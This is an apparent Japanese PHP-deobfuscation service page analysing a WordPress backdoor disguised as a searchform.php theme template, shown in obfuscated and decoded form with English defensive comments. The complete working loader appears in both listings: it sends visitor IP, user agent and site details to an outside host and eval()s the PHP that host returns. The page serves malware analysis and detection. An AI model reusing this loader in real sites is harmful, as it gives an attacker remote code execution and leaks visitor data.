
PHP 難読化コードの復元・デコード

WordPress などで見つかる PHP のマルウェア・ウィルス・改ざんコードをオンラインでデコードして難読化を解除し、
元の読みやすいコードに戻して解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php /* * The searchform.php template. * * Used any time that get_search_form() is called. * * @link https://wordpress.org/themes/template/ * @package WordPress * @subpackage * @since 1.0 */ $EisCC="n5TdsWMvfU67VXw&;h_GpykLBjc8a2NtRFI-mSuO0J9>:ilZ gz1e4QKC.D3/HYqxPro=AEb";$GKotnoU='base64...



難読化されたPHPコード

<?php


// ANALYSIS NOTE (defensive): this is the obfuscated form of the sample and is kept
// byte-for-byte so that it can still be matched against files found on a site.
// The docblock that follows imitates a WordPress theme template header; none of the
// code shown after it renders a search form.
/* 
 * The searchform.php template.
 *
 * Used any time that get_search_form() is called.
 *
 * @link https://wordpress.org/themes/template/
 * @package WordPress
 * @subpackage 
 * @since 1.0 */
 



// Obfuscation techniques visible in the one-line payload below:
//   - $EisCC is a character lookup table; the host name, $_SERVER keys and the request
//     header are spelled out one character at a time as $EisCC[n] concatenations.
//   - 'base64_decode' is held in $GKotnoU and called through the variable.
//   - the literal 'Y3'.'Vy'.'bF9p'.'bm'.'l0' is split base64 for "curl_init".
//   - cURL options are passed as bare integers instead of CURLOPT_* constant names.
// Behaviour: it fetches a response from a remote auth.php over HTTP, applies str_rot13
// and base64 decoding, and passes the result to eval() when it contains the marker
// 'fa704e7366d666bd'. Static indicators worth searching for in a code base: that
// marker string, the lookup-table string, and eval() fed by str_rot13 + base64 output.
$EisCC="n5TdsWMvfU67VXw&;h_GpykLBjc8a2NtRFI-mSuO0J9>:ilZ gz1e4QKC.D3/HYqxPro=AEb";$GKotnoU='base64_decode';$vXKzarSqz = $EisCC[64].$EisCC[7].$EisCC[26].$EisCC[57].$EisCC[26].$EisCC[64];$UlfmeWlz = "auth.php";$dsH = "http://";$dsH .= $vXKzarSqz;$dsH .= '/';$dsH .= $UlfmeWlz;$agkH = urlencode((isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $_SERVER[$EisCC[65].$EisCC[5].$EisCC[58]]));$PYBFUMzJv = $_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[61].$EisCC[39].$EisCC[37].$EisCC[2]];$rDd = $_SERVER["SCRIPT_NAME"];if (isset($_SERVER['HTTP_CLIENT_IP'])) $PLxAVm = $_SERVER['HTTP_CLIENT_IP'];elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) $PLxAVm = $_SERVER['HTTP_X_FORWARDED_FOR'];elseif(isset($_SERVER['HTTP_X_FORWARDED'])) $PLxAVm = $_SERVER['HTTP_X_FORWARDED'];elseif(isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP'])) $PLxAVm = $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];elseif(isset($_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32]])) $PLxAVm = $_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32]];elseif(isset($_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58]])) $PLxAVm = $_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58]];elseif(isset($_SERVER[$EisCC[32].$EisCC[70].$EisCC[6].$EisCC[39].$EisCC[2].$EisCC[70].$EisCC[18].$EisCC[69].$EisCC[58].$EisCC[58].$EisCC[32]])) $PLxAVm = $_SERVER[$EisCC[32].$EisCC[70].$EisCC[6].$EisCC[39].$EisCC[2].$EisCC[70].$EisCC[18].$EisCC[69].$EisCC[58].$EisCC[58].$EisCC[32]];else $PLxAVm = 
'UNKNOWN';$yVmUFDc = $EisCC[56].$EisCC[67].$EisCC[67].$EisCC[22].$EisCC[45].$EisCC[52].$EisCC[44].$EisCC[48].$EisCC[16].$EisCC[45].$EisCC[20].$EisCC[68].$PLxAVm.$EisCC[16].$EisCC[38].$EisCC[28].$EisCC[68].$agkH.$EisCC[16].$EisCC[17].$EisCC[67].$EisCC[4].$EisCC[31].$EisCC[68].$PYBFUMzJv.';req='.$rDd.';';$AFCLFaeBi = array('http'=>array('method'=>'GET', 'header'=>$yVmUFDc));if( function_exists($GKotnoU('Y3'.'Vy'.'bF9p'.'bm'.'l0')) ) { $ttekHhTRK = curl_init(); $DGxuu = array(10023 => array($yVmUFDc),10002 => $dsH,19913 => 1,64 => false,52 => true,42 => false); curl_setopt_array($ttekHhTRK, $DGxuu); $ttekHhTRK2 = curl_exec($ttekHhTRK); curl_close($ttekHhTRK);}else { $ttekHhTRK2 = @file_get_contents($dsH,false,stream_context_create($AFCLFaeBi)); }$ttekHhTRK2 = str_rot13($ttekHhTRK2);$ttekHhTRK2 = $GKotnoU($ttekHhTRK2);if(stripos($ttekHhTRK2,'fa704e7366d666bd')!==FALSE) eval($ttekHhTRK2);

?>

デコード(難読化解除)されたコード

<?php

// ANALYSIS NOTE (defensive): deobfuscator output for a remote-code loader. On each
// execution it reports request details to a remote host and evaluates whatever PHP
// that host sends back. The code is left exactly as decoded; only comments are added.
// Indicators visible in this listing (host defanged): xvc[.]cx, the path /auth.php,
// the marker 'fa704e7366d666bd', and the "Cookie: ;ip=...;ua=...;host=...;req=...;"
// request header assembled further down.

/* 
 * The searchform.php template.
 *
 * Used any time that get_search_form() is called.
 *
 * @link https://wordpress.org/themes/template/
 * @package WordPress
 * @subpackage 
 * @since 1.0 */
// The docblock above imitates a WordPress theme template header; none of the code
// shown after it renders a search form.

// Character lookup table: obfuscated strings are built by indexing single characters
// out of this value (still visible in the header assembly below).
$EisCC = "n5TdsWMvfU67VXw&;h_GpykLBjc8a2NtRFI-mSuO0J9>:ilZ gz1e4QKC.D3/HYqxPro=AEb";
// Function name held in a variable, so the decoder is invoked as $GKotnoU(...).
$GKotnoU = 'base64_decode';
// Remote host and script name; the obfuscated original spells the host via $EisCC[n].
$vXKzarSqz = "xvc.cx";
$UlfmeWlz = "auth.php";
// The four assignments below are the deobfuscator's constant-folded rendering of a
// chain of `.=` appends in the original; only the last value is used.
$dsH = "http://";
$dsH = "http://xvc.cx";
$dsH = "http://xvc.cx/";
$dsH = "http://xvc.cx/auth.php";
// URL-encoded User-Agent of the current request; when that header is absent the
// code reads $_SERVER["PWD"] instead.
$agkH = urlencode(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $_SERVER["PWD"]);
// Host header and script path of the infected site, sent to the remote host below.
$PYBFUMzJv = $_SERVER["HTTP_HOST"];
$rDd = $_SERVER["SCRIPT_NAME"];
// Visitor address: request headers are checked first and REMOTE_ADDR last, so the
// reported value is whatever the client or an upstream proxy put in those headers.
if (isset($_SERVER['HTTP_CLIENT_IP'])) {
    $PLxAVm = $_SERVER['HTTP_CLIENT_IP'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $PLxAVm = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED'])) {
    $PLxAVm = $_SERVER['HTTP_X_FORWARDED'];
} elseif (isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP'])) {
    $PLxAVm = $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];
} elseif (isset($_SERVER["HTTP_FORWARDED_FOR"])) {
    $PLxAVm = $_SERVER["HTTP_FORWARDED_FOR"];
} elseif (isset($_SERVER["HTTP_FORWARDED"])) {
    $PLxAVm = $_SERVER["HTTP_FORWARDED"];
} elseif (isset($_SERVER["REMOTE_ADDR"])) {
    $PLxAVm = $_SERVER["REMOTE_ADDR"];
} else {
    $PLxAVm = 'UNKNOWN';
}
// Not decoded by the tool. Resolved against $EisCC this is:
//   "Cookie: ;ip=" . $PLxAVm . ";ua=" . $agkH . ";host=" . $PYBFUMzJv . ";req=" . $rDd . ";"
// i.e. the visitor address, User-Agent, site host and script path leave the server in
// a Cookie request header. Only the User-Agent value is URL-encoded.
$yVmUFDc = $EisCC[56] . $EisCC[67] . $EisCC[67] . $EisCC[22] . $EisCC[45] . $EisCC[52] . $EisCC[44] . $EisCC[48] . $EisCC[16] . $EisCC[45] . $EisCC[20] . $EisCC[68] . $PLxAVm . $EisCC[16] . $EisCC[38] . $EisCC[28] . $EisCC[68] . $agkH . $EisCC[16] . $EisCC[17] . $EisCC[67] . $EisCC[4] . $EisCC[31] . $EisCC[68] . $PYBFUMzJv . ';req=' . $rDd . ';';
// Stream context carrying the same header, used by the file_get_contents() fallback.
$AFCLFaeBi = array('http' => array('method' => 'GET', 'header' => $yVmUFDc));
// 'Y3VybF9pbml0' is base64 for "curl_init": cURL is used when the extension exists.
if (function_exists($GKotnoU('Y3VybF9pbml0'))) {
    $ttekHhTRK = curl_init();
    // Options given as integers rather than constant names:
    //   10023 CURLOPT_HTTPHEADER, 10002 CURLOPT_URL, 19913 CURLOPT_RETURNTRANSFER,
    //   64 CURLOPT_SSL_VERIFYPEER (false), 52 CURLOPT_FOLLOWLOCATION (true),
    //   42 CURLOPT_HEADER (false).
    $DGxuu = array(10023 => array($yVmUFDc), 10002 => $dsH, 19913 => 1, 64 => false, 52 => true, 42 => false);
    curl_setopt_array($ttekHhTRK, $DGxuu);
    $ttekHhTRK2 = curl_exec($ttekHhTRK);
    curl_close($ttekHhTRK);
} else {
    // The @ operator suppresses warnings, so a failed fetch produces no visible error.
    $ttekHhTRK2 = @file_get_contents($dsH, false, stream_context_create($AFCLFaeBi));
}
// Response decoding: ROT13 first, then base64.
$ttekHhTRK2 = str_rot13($ttekHhTRK2);
$ttekHhTRK2 = $GKotnoU($ttekHhTRK2);
// The decoded response is executed when it contains the marker (case-insensitive
// substring match). This is remote code execution controlled by the remote host: the
// code that actually runs is not in this file and can differ per request, so a site
// carrying this loader should be treated as fully compromised. Compare theme files
// with clean copies and review outbound HTTP requests from the web server.
if (stripos($ttekHhTRK2, 'fa704e7366d666bd') !== FALSE) {
    eval($ttekHhTRK2);
}

